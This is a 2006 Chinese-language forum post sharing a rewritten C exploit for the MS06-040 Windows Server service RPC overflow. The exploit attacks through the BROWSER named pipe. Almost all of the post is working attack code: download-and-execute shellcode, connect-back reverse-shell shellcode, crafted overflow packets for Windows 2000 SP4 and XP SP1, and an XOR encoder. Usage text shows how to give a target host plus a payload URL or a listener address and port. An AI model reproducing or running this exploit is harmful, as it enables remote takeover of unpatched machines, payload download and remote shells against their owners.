文章作者:mika[EST]
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.)
首先感謝macro哥哥的代碼�����,沒有這個(gè)代碼俺也不敢去想修改什么exploit。以前經(jīng)?�?碽f弄這個(gè)漏洞那個(gè)漏洞的����,也學(xué)到了點(diǎn)東西。有代碼了���,修改就方便了�。程序的運(yùn)行幫助如下:
F:\work\exploits\Release>ms06040rpc
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
rewritten by superlone@
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Usage: ms06040rpc <host> <download url> <os type>
ms06040rpc <host> <reverse addr> <revser port> <os type>
<download url>:
such as:http://192.168.0.128/test.exe
<reverse addr>:
your host ip address
<reverse port>:
your host listenning port
<os type(1/2)>:
1: win 2000sp4 2:win xpsp1
^_^Mika is telling you:don‘t play with fire!
嘿嘿~~~一看就懂吧�����。
我一開始修改的版本在獲得反向shell后���,如果退出這個(gè)shell后就會(huì)造成對(duì)方機(jī)器出現(xiàn)關(guān)機(jī)對(duì)話框�。
不過還好,請(qǐng)BF給解決了���。嘿嘿
代碼在下面:
CODE:
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
// Define Decode Parameter
#define DECODE_LEN 23
#define SC_LEN_OFFSET 8
#define ENC_KEY_OFFSET 13
#define ENC_KEY 0xFF
// Shellcode string
unsigned char sc[1024] = "";
unsigned int Sc_len;
unsigned char shellcodenew[]={//download shellcode
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xEE\xEE\x80\x34\x0B\xFF\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\xE9\xF2\x00\x00\x00\x5F\x64\xA1\x30"
"\x00\x00\x00\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x68\x08\x8B\xF7\x6A"
"\x04\x59\xE8\x92\x00\x00\x00\xE2\xF9\x68\x6F\x6E\x00\x00\x68\x75"
"\x72\x6C\x6D\x54\xFF\x16\x8B\xE8\xE8\x7C\x00\x00\x00\x83\xEC\x20"
"\x8B\xDC\x6A\x20\x53\xFF\x56\x04\xC7\x04\x03\x5C\x61\x2E\x65\xC7"
"\x44\x03\x04\x78\x65\x00\x00\x33\xC0\x50\x50\x53\x57\x50\xFF\x56"
"\x10\x8B\xEC\x81\xED\xBB\x00\x00\x00\x89\x5D\xA0\x8B\x5E\x08\x89"
"\x5D\xA4\x8B\xE5\x81\xEC\xDD\x00\x00\x00\x8D\x85\xA8\xFF\xFF\xFF"
"\x6A\x44\x59\xC6\x00\x00\x40\xE2\xFA\xC7\x45\xA8\x44\x00\x00\x00"
"\x8B\xF4\x8D\x45\xEC\x50\x8D\x4D\xA8\x51\x6A\x00\x6A\x00\x6A\x20"
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x8B\x55\xA0\x52\xFF\x55\xA4\x3B"
"\xF4\xE8\xA4\x07\x00\x00\xFF\x56\x0C\x51\x56\x8B\x75\x3C\x8B\x74"
"\x2E\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x03"
"\xC5\x33\xDB\x0F\xBE\x10\x3A\xD6\x74\x08\xC1\xCB\x0D\x03\xDA\x40"
"\xEB\xF1\x3B\x1F\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B"
"\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xAB\x5E\x59\xC3\xE8\x09"
"\xFF\xFF\xFF\x8E\x4E\x0E\xEC\xC1\x79\xE5\xB8\x72\xFE\xB3\x16\xEF"
"\xCE\xE0\x60\x36\x1A\x2F\x70"
};
unsigned char connectbacksc[]=
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
"\xca\x6e\x84\x0b\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9"
"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
"\xff\x77\xfc\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
BYTE Data2000[] =//packets for win2000.arguments size:AllocHint,less than 5000
{"\x75\x6b\x22"
"\x56\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x1b"
"\xf7\x15\x02\x00\x00\x00\x00\x00\x00\x15\x02\x00\x00\x4a\xf9\x42"
"\xf5\x93\x4a\x93\x37\x93\xf5\x92\x9b\x93\x27\x4f\x47\x49\x37\xd6"
"\xfc\xfd\x27\x4a\x90\x90\x40\x9f\x9f\x9b\x3f\xfd\xf9\x43\x4b\x92"
"\x40\x43\x4e\x96\x49\x90\x93\x3f\x91\x98\x96\xf8\x4a\x99\x3f\x43"
"\xf5\x40\x9f\x47\x9b\x98\x41\x9f\x4b\x3f\x40\x42\x4a\x92\x90\x4f"
"\x92\x46\x96\x40\x41\xfd\x41\x3f\x96\x43\x4e\x49\x43\x4f\x91\xfc"
"\x4f\x93\x3f\x27\x96\x91\x37\x97\x98\x98\x98\x4a\xf5\x91\x96\x93"
"\x93\x47\x97\x49\x96\x97\xf5\xd6\x47\x91\x91\x90\x42\x48\x98\x42"
"\x49\x3f\x93\x90\x93\x4e\x47\x47\x99\x92\x27\xfd\xfd\xfc\x4b\x91"
"\x4b\x43\x4b\xd6\x46\x37\x92\xf5\x46\x4f\x99\x9f\xd6\x97\xf5\x9b"
"\xf8\x43\xf8\x97\x4f\x3f\x41\x27\x96\x92\x27\x93\x4b\x98\x9b\x48"
"\x47\xf8\x93\x48\xfc\x98\xf5\x91\x4f\x9f\x42\x4a\x48\x4a\x97\x4e"
"\x91\x49\x90\xf8\x91\x4f\x92\x96\x92\xd6\x47\x98\x90\x40\xf5\xfc"
"\x46\xf5\x46\xf9\xd6\x4f\xfc\x98\x91\x41\x91\x48\xfc\x98\x49\x49"
"\xfc\x41\x37\x46\x46\xf5\x90\x3f\x48\x4a\x40\x37\x47"
"\x41\xf5\x93"
"\xf8\x40\x92\x49\x4a\x37\xfd\xf8\x93\x9b\x46\x47\x47\x92\x92\x92"
"\x93\x99\x93\x93\xfd\x3f\x42\x47\x90\x96\x92\x4f\x4a\x4a\x93\x93"
"\x46\x3f\xf9\xfd\x90\x9b\x97\x47\x9b\x91\x49\xd6\x97\x91\x4b\x40"
"\x27\x46\x42\x91\x48\x97\x4e\x93\x90\x96\x49\xf5\xf9\x43\x4b\x41"
"\xf5\x48\xfd\x4b\x41\x43\x40\x4b\xf9\x97\xfd\xfc\xf9\xfc\xf9\x96"
"\x9f\x99\xd6\x41\x4a\xd6\x27\x4a\x99\x27\x48\xf5\xf9\x90\x37\x42"
"\x91\x40\xfc\x4b\x41\x96\x90\x9f\xfc\x47\xf5\x27\xf5\x92\x47\x96"
"\x4a\x4f\x92\x46\x98\x4b\x92\x3f\x41\xf8\x46\xd6\xfc\x27\x27\x49"
"\x49\x9f\x27\x4f\x92\x46\xd6\x41\xf9\x37\x37\x97\xfc\x91\xf5\x46"
"\x47\x48\xfd\x96\xf5\x90\x90\x4b\x9b\xfd\xf8\xf8\x4a\x27\x46\x91"
"\x99\x93\x93\xd6\x97\xf9\x43\x9b\xfc\xd6\xfd\x41\xd6\xd6\x9f\x97"
"\x4f\x49\x9b\xd6\x42\x37\x40\xf8\x9b\xfc\x90\xfd\x42\xd6\x41\x49"
"\x97\x3f\x99\x93\xf8\x49\x27\x97\xd6\x92\x47\x93\x4e\x9f\x37\xd6"
"\xfd\xd6\x4b\x42\x46\x91\x4a\x9f\x91\x49\x90\x4e\x49\x48\x98\x27"
"\xd6\x46\x90\x43\x3f\xf9\xf8\x48\x3f\x40\x4b\x9f\x37\x9b\xd6\xfd"
"\x40\xd6\x99\x47\x46\x97\x90\x49\x4e\xfd\x93\x3f\x3f"
"\x4a\xd6\x40"
"\x96\xd6\xf9\x27\xfd\x4f\x43\x90\xf8\x42\xd6\x92\x43\x96\x91\x4a"
"\x46\x4f\xfd\x92\xfc\x40\x37\x97\xf5\xf5\x97\x92\x4b\x99\xf8\x37"
"\xf5\x40\x98\x40\xfc\x42\xf9\x4b\x99\x43\x40\x97\x48\x4e\x49\x41"
"\xf9\x90\x49\xfc\x47\xfd\x93\x48\x42\x4a\x40\xd6\x96\x37\x27\x43"
"\x49\x92\x4f\x41\x93\xd6\x4e\x9f\x43\x98\x4e\xd6\x96\x3f\x9f\x4b"
"\x4a\x99\x47\x37\xfc\xf9\xd6\x99\xf8\x27\x4b\x47\x90\xf9\x49\x4b"
"\xd6\xfd\x99\x90\x4e\x98\xfd\x4b\x96\x43\x4f\x3f\x4a\x90\xf9\x42"
"\x96\x40\x4e\x37\x99\x48\x40\x49\x27\x97\x92\xd6\x37\x93\x37\x46"
"\xfd\x96\x42\x9b\xf8\x9b\x4b\x97\x40\x91\x4b\x93\xd6\x4f\x42\x9f"
"\x4b\x4e\xf5\xfd\x91\x99\xfc\x99\x92\x27\x3f\xf9\x49\xfc\xf5\xf5"
"\x37\x3f\xd6\x92\x4b\xf9\x3f\x97\x4b\x9b\x4f\x49\x47\x47\x3f\xfd"
"\x98\xd6\x37\x4b\x4a\x91\x90\x27\x3f\x97\xf9\xd6\xd6\x90\x40\x40"
"\x43\x43\x40\xf8\x90\x96\x92\x48\x96\x27\xf9\x99\x96\x96\x4f\x96"
"\x4b\x4f\x98\xf9\x41\x93\x99\xd6\x9b\x97\x4e\x4e\xfd\x46\x37\x9f"
"\x40\xfd\x97\x47\x9b\x41\x43\x42\x4e\x40\x4e\x3f\x37\x97\x9f\x37"
"\xfd\x92\x98\x90\x91\xfd\x90\xf8\xfc\x93\x96\x91\x41"
"\x4f\x9f\x46"
"\x92\x27\x4f\x3f\x40\x37\x91\x4e\x4f\xf5\x99\x3f\x4a\x93\x99\x9f"
"\xf5\x90\x46\x93\x43\x27\x27\x4f\x4e\x91\x42\x6a\x35\x59\xd9\xee"
"\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd3\x45\x7d\xa2\x83\xeb\xfc\xe2"
"\xf4\x52\x81\x82\x4d\x2c\xba\x39\x5e\x3b\x01\x7d\xa2\xd3\xce\x38"
"\x9e\x58\x39\x78\xda\xd2\xaa\xf6\xed\xcb\xce\x22\x82\xd2\xae\x34"
"\x29\xe7\xce\x7c\x4c\xe2\x85\xe4\x0e\x57\x85\x09\xa5\x12\x8f\x70"
"\xa3\x11\xae\x89\x99\x87\x61\x79\xd7\x36\xce\x22\x86\xd2\xae\x1b"
"\x29\xdf\x0e\xf6\xfd\xcf\x44\x96\x29\xcf\xce\x7c\x49\x5a\x19\x59"
"\xa6\x10\x74\xbd\xc6\x58\x05\x4d\x27\x13\x3d\x71\x29\x93\x49\xf6"
"\xd2\xcf\xe8\xf6\xca\xdb\xae\x74\x29\x53\xf5\x7d\xa2\xd3\xce\x15"
"\x9e\x8c\x74\x8b\xc2\x85\xcc\x85\x21\x13\x3e\x2d\xca\x3c\x8b\x9d"
"\xc2\xbb\xdd\x83\x28\xdd\x12\x82\x45\xb0\x28\x19\x8c\xb6\x3d\x18"
"\x82\xfc\x26\x5d\xcc\xb6\x31\x5d\xd7\xa0\x20\x0f\x82\xe2\x77\x4e"
"\x82\xe2\x77\x4e\x82\xfc\x04\x39\xe6\xf3\x63\x5b\x82\xbd\x20\x09"
"\x82\xbf\x2a\x1e\xc3\xbf\x22\x0f\xcd\xa6\x35\x5d\xe3\xb7\x28\x14"
"\xcc\xba\x36\x09\xd0\xb2\x31\x12\xd0\xa0\x65\x4c\x90"
"\xe0\x65\x52\xe3\x97\x01\x7d\xa2"
"\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
"\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
"\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
"\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
"\x00\x00\x93\xc8\xf5\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x00\x00\xeb\x02\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00"
};
BYTE Dataxp[] =//packets for win2000.arguments size:AllocHint,less than 5000
{"\x0e\x4c\x9f\xe6\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xc8\x52\x63\x01\x00\x00"
"\x00\x00\x00\x00\x63\x01\x00\x00\xfd\x4e\x4a\x48\x43\x4f\x47\x99"
"\x93\xf8\x3f\x40\x98\x92\x9f\x91\x93\x43\xf5\x90\x4e\xd6\x92\x27"
"\x91\x48\x99\xf5\x49\x43\x4e\x93\x49\x43\x90\x98\x4a\x98\x4e\x4f"
"\x27\x46\xf9\x96\xd6\x90\x40\xfc\xfc\x93\x91\xf8\x4f\x27\x98\x42"
"\x4f\x96\x48\x41\x90\x4a\x42\x9f\xfd\x98\x91\x91\x46\x41\x41\x92"
"\x3f\xfc\x99\x93\x4e\x96\x40\x91\x98\x43\x96\x93\xf5\xd6\x4f\x9b"
"\x27\x9f\x9b\xfd\x99\x3f\xfd\x4f\xd6\x91\x4a\x96\x98\xfd\xf9\x9b"
"\x37\x41\xfc\x9f\x42\x4a\x40\xf8\x43\x4a\x98\x41\x91\x91\xf9\xd6"
"\xd6\x9b\x49\x42\x3f\x90\xfc\x9b\x4b\x92\xfc\x37\x96\xfc\x41\x98"
"\xfc\x4f\x4e\x91\x97\x4a\x92\x49\x92\x9f\x91\x41\x4a\x41\x98\x27"
"\x98\xd6\x91\x48\xfc\xfc\xf5\x4b\x9f\x9f\xfc\xd6\xf8\x49\x6a\x35"
"\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60\xd2\x21\xae\x83"
"\xeb\xfc\xe2\xf4\xe1\x16\xde\x41\x9f\x2d\x65\x52\x88\x96\x21\xae"
"\x60\x59\x64\x92\xeb\xae\x24\xd6\x61\x3d\xaa\xe1\x78\x59\x7e\x8e"
"\x61\x39\x68\x25\x54\x59\x20\x40\x51\x12\xb8\x02\xe4\x12\x55\xa9"
"\xa1\x18\x2c\xaf\xa2\x39\xd5\x95\x34\xf6\x25\xdb\x85\x59\x7e\x8a"
"\x61\x39\x47\x25\x6c\x99\xaa\xf1\x7c\xd3\xca\x25\x7c\x59\x20\x45"
"\xe9\x8e\x05\xaa\xa3\xe3\xe1\xca\xeb\x92\x11\x2b\xa0\xaa\x2d\x25"
"\x20\xde\xaa\xde\x7c\x7f\xaa\xc6\x68\x39\x28\x25\xe0\x62\x21\xae"
"\x60\x59\x49\x92\x3f\xe3\xd7\xce\x36\x5b\xd9\x2d\xa0\xa9\x71\xc6"
"\x8f\x1c\xc1\xce\x08\x4a\xdf\x24\x6e\x85\xde\x49\x03\xbf\x45\x80"
"\x05\xaa\x44\x8e\x4f\xb1\x01\xc0\x05\xa6\x01\xdb\x13\xb7\x53\x8e"
"\x51\xe0\x12\x8e\x51\xe0\x12\x8e\x4f\x93\x65\xea\x40\xf4\x07\x8e"
"\x0e\xb7\x55\x8e\x0c\xbd\x42\xcf\x0c\xb5\x53\xc1\x15\xa2\x01\xef"
"\x04\xbf\x48\xc0\x09\xa1\x55\xdc\x01\xa6\x4e\xdc\x13\xf2\x10\x9c"
"\x53\xf2\x0e\xef\x24\x96\x21\xae\x31\x76\x57\x4e\x65\x59\x45\x4d"
"\x69\x73\x49\x39\x76\x32\x39\x52\x74\x55\x5a\x57\x6c\x6e\x6b\x4b"
"\x51\x64\x39\x4e\x55\x32\x73\x31\x71\x44\x6f\x55\x4d\x44\x6f\x70"
"\x33\x58\x47\x70\x35\x34\x7a\x6e\x61\x4c\x6d\x4e\x39\x30\x50\x39"
"\x47\x4d\x64\x50\x46\x63\x4b\x61\x74\x63\x62\x38\x44\x69\x76\x76"
"\x39\x49\x61\x51\x41\x5a\x37\x36\x6e\x6a\x6f\x6d\x7a\x6e\x46\x43"
"\x46\x79\x4e\x6e\x4c\x4d\x53\x48\x7a\x46\x77\x78\x47\x63\x52\x5a"
"\x35\x30\x6f\x42\x33\x42\x57\x38\x56\x59\x7a\x47\x6b\x78\x62\x6b"
"\x76\x68\x79\x63\x4b\x68\x42\x69\x46\x53\x54\x39\x4a\x6e\x38\x74"
"\x75\x72\x78\x50\x69\x6d\x61\x57\x70\x62\x76\x36\x38\x74\x77\x69"
"\x62\x6b\x4a\x59\x38\x52\x75\x63\x6c\x5a\x62\x77\x32\x51\x6f\x4b"
"\x75\x4c\x6d\x32\x48\x6c\x50\x4f\x37\x53\x48\x74\x34\x65\x4f\x35"
"\x58\x6e\x47\x53\x69\x56\x48\x62\x36\x52\x78\x35\x7a\x61\x4b\x37"
"\x6f\x64\x49\x31\x4b\x6f\x38\x31\x35\x4c\x33\x61\x0a\x08\x02\x00"
"\x77\x6d\x4f\x36\x48\x7a\x47\x79\x04\x08\x02\x00\x7a\x37\x38\x43"
"\x47\x50\x59\x78\x34\x31\x79\x68\x55\x30\x4c\x6b\x61\x43\x6b\x70"
"\x67\x68\x70\x49\x4d\x55\x74\x55\x73\x45\x74\x5a\x04\x08\x02\x00"
"\x5a\x7a\x44\x68\x56\x75\x4e\x6c\x04\x08\x02\x00\x7a\x52\x66\x53"
"\x66\x5a\x54\x49\x75\x56\x6a\x63\x75\x5a\x66\x55\x4c\x6d\x64\x4d"
"\x45\x36\x42\x62\x74\x34\x36\x46\x54\x58\x66\x46\x00\x00\x43\x07"
"\xc7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x8d\xc1\x61\x00\x00\x00\x00\x00\x00\x00"
};
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};//for bind port use
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE POP[] =//stub header RPCFUNC structure
{
"\x05\x00\x00\x03\x10\x00\x00\x00\x80\x04\x00\x00\x01\x00\x00\x00"
"\x68\x04\x00\x00\x00\x00\x1f\x00"
};
void makecode(char *url);
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int Attack(HANDLE PipeHandle,char *paramstr,int i,unsigned short port,int type)
{
struct RPCFUNC RPCOP;
int bwritten=0;
BYTE *LargeBuffer=NULL;
BYTE rbuf[0x100]="";
unsigned long ip=0;
DWORD dw;
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
if(strlen(paramstr)==1)
{
}
else if(type==0)
{
makecode(paramstr);
}
else
{
ip=inet_addr(paramstr);
port=htons(port);
memcpy(connectbacksc+160,&ip,4);
memcpy(connectbacksc+166,&port,2);
memcpy(sc,connectbacksc,sizeof(connectbacksc));
Sc_len=sizeof(connectbacksc);
}
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 31;
printf("^_^Mika is telling you:don‘t play with fire!^o^\n\n");
if(i==1)//win 2000
{
RPCOP.FragLength=sizeof(RPCOP)+1128;//1128:size of data1;FragLength:size ofPOP+size of data1
RPCOP.AllocHint=1128;
LargeBuffer=(BYTE *)malloc(24+1128);
memset(LargeBuffer,0x00,24+1128);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Data2000,1128);
if(strlen(paramstr)!=1)
{
memcpy(LargeBuffer+24+32, sc, Sc_len);
}
printf("Sending payload...\n");
TransactNamedPipe(PipeHandle, LargeBuffer,
24+1128, rbuf, sizeof(rbuf), &dw, NULL);
}
if(i==2)//win xp
{
RPCOP.FragLength=sizeof(RPCOP)+772;//772:size of dataxp;FragLength:size of POP+size of data1
RPCOP.AllocHint=772;
LargeBuffer=(BYTE *)malloc(24+772);
memset(LargeBuffer,0x00,24+772);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Dataxp,772);
printf("Sending payload1...finish\n");
memcpy(LargeBuffer+24+32, sc, Sc_len);
TransactNamedPipe(PipeHandle, LargeBuffer,
24+772, rbuf, sizeof(rbuf), &dw, NULL);
printf("Sending payload2...finish\n");
memset(LargeBuffer,0x00,24+772);
memcpy(LargeBuffer,&RPCOP,24);
memcpy(LargeBuffer+24,&Dataxp,772);
memcpy(LargeBuffer+24+32, sc, Sc_len);
TransactNamedPipe(PipeHandle, LargeBuffer,
24+772, rbuf, sizeof(rbuf), &dw, NULL);
}
free(LargeBuffer);
return 0;
}
void makecode(char *url)
{
int length=0;
unsigned int Enc_key=ENC_KEY;
unsigned int i,j,l;
Sc_len = sizeof(shellcodenew)+strlen(url)+2;
ZeroMemory(sc,1024);
memcpy(sc,shellcodenew,sizeof(shellcodenew));
memcpy(sc+sizeof(shellcodenew)-1,url,strlen(url));
for(i=0xff; i>0; i--)
{
l = 0;
for(j=DECODE_LEN; j<Sc_len; j++)
{
if (
((sc[j] ^ i) == 0x26) || //%
((sc[j] ^ i) == 0x3d) || //=
((sc[j] ^ i) == 0x3f) || //?
((sc[j] ^ i) == 0x40) || //@
((sc[j] ^ i) == 0x00) ||
((sc[j] ^ i) == 0x0D) ||
((sc[j] ^ i) == 0x0A) ||
((sc[j] ^ i) == 0x5c) ||
((sc[j] ^ i) == 0x5f) ||
((sc[j] ^ i) == 0x2e) ||
((sc[j] ^ i) == 0x2f)
) // Define Bad Characters
{
l++; // If found the right XOR byte,l equals 0
break;
};
}
if (l==0)
{
Enc_key = i;
printf("[+] Find XOR Byte: 0x%02X\n", i);
for(j=DECODE_LEN; j<Sc_len; j++)
{
sc[j] ^= Enc_key;
}
break; // If found the right XOR byte, Break
}
}
// Deal with not found XOR byte
if (l!=0)
{
printf("[-] No xor byte found!\r\n");
exit(-1);
}
// Deal with DeCode string
*(unsigned short *)&sc[SC_LEN_OFFSET] = Sc_len;
*(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc<4)
{
printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n");
printf("\t\t rewritten by [email]superlone@[/email]\n");
printf(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n");
printf("Usage: %s <host> <download url> <os type>\n\n", argv[0]);
printf("\t%s <host> <reverse addr> <revser port> <os type>\n\n",argv[0]);
printf(" <download url>:\n\t\tsuch as:[url]http://192.168.0.128/test.exe[/url]\n\n");
printf("<reverse addr>:\n\t\tyour host ip address\n\n");
printf("<reverse port>:\n\t\tyour host listenning port\n\n");
printf("<os type(1/2)>:\n\t\t 1: win 2000sp4 2:win xpsp1\n\n");
printf("^_^Mika is telling you:don‘t play with fire!\n");
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe),
"\\\\%s\\pipe\\BROWSER",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
if (argc==5)
{
Attack(hFile,argv[2],atoi(argv[4]),atoi(argv[3]),1);
}
else
{
//SendMalformed RPC request
Attack(hFile,argv[2],atoi(argv[3]),0,0);
}
return 0;
}
再次感謝macro哥哥的無私共享,不然俺要寫出這么個(gè)程序來還得很長(zhǎng)的路要走�!
[ 此貼被mika在2006-09-04 16:57重新編輯 ]
